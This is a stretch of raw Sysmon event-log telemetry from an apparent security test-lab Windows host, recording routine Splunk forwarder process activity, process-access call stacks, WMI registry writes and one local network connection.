AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.198{266CAFBE-6573-6064-4701-00000000AE01}18285744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DA3F59C0F2942E1250F8C49A6AC3205,SHA256=411EC198E7FA57253E7925F5BC37185F23307E1F38E6C3AB0B7C490D94F103EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:07.042{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.042{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:07.043{266CAFBE-6573-6064-4701-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:08.104{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FC23C20472B7F9B0E7233757D75441,SHA256=C3B277F9057F1BF5E70B213F4297551C330CDC42C811112CBD8D40F4942DA1D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:07.995{266CAFBE-6573-6064-4801-00000000AE01}60245616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.478{266CAFBE-6575-6064-4901-00000000AE01}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.134{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=107BA00D74DCBA946E2D902E8541BCDB,SHA256=631582EF3712B4AD6072E1DD47F7B36E40DAAA3540252D37B1D7309E370C7C23,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 13241300x80000000000000009663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000009662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 
13241300x80000000000000009661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000009659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000009657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 
12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000009656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000009655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:-1711938829,HighDateTime:30871737***Binary mof compiled successfully 13241300x80000000000000009654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000009653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-03-31 12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000009652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-03-31 
12:05:10.883{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 354300x80000000000000009651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:09.431{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53636-false10.0.1.12-8000- 23542300x80000000000000009650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:10.165{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE714006FD128A8ECF7E9CC896F9A94,SHA256=18176A17CEC7AE6640ED8D338080F56CE8EC82E78DA98223DA5F09F97332072C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:11.195{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F8A1F64A543149418AA1B33531D7C90,SHA256=A7BA178195A3FD655A672969803D0DE4A9CDF19A5EEC204DEC1687C894B371A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:12.226{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F653C551C36DCD79C94C9BBA998EB0E,SHA256=CD972B9815C06F30BE470D5A51C701722AC08C3DF22086184FA05AE1741ED68D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:13.240{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45796493CD3582B3FF55696796F56247,SHA256=DF981E46217D9B1B89865D1449E3E70D6249F1296A4A95C28CDDC095119C09DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.255{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 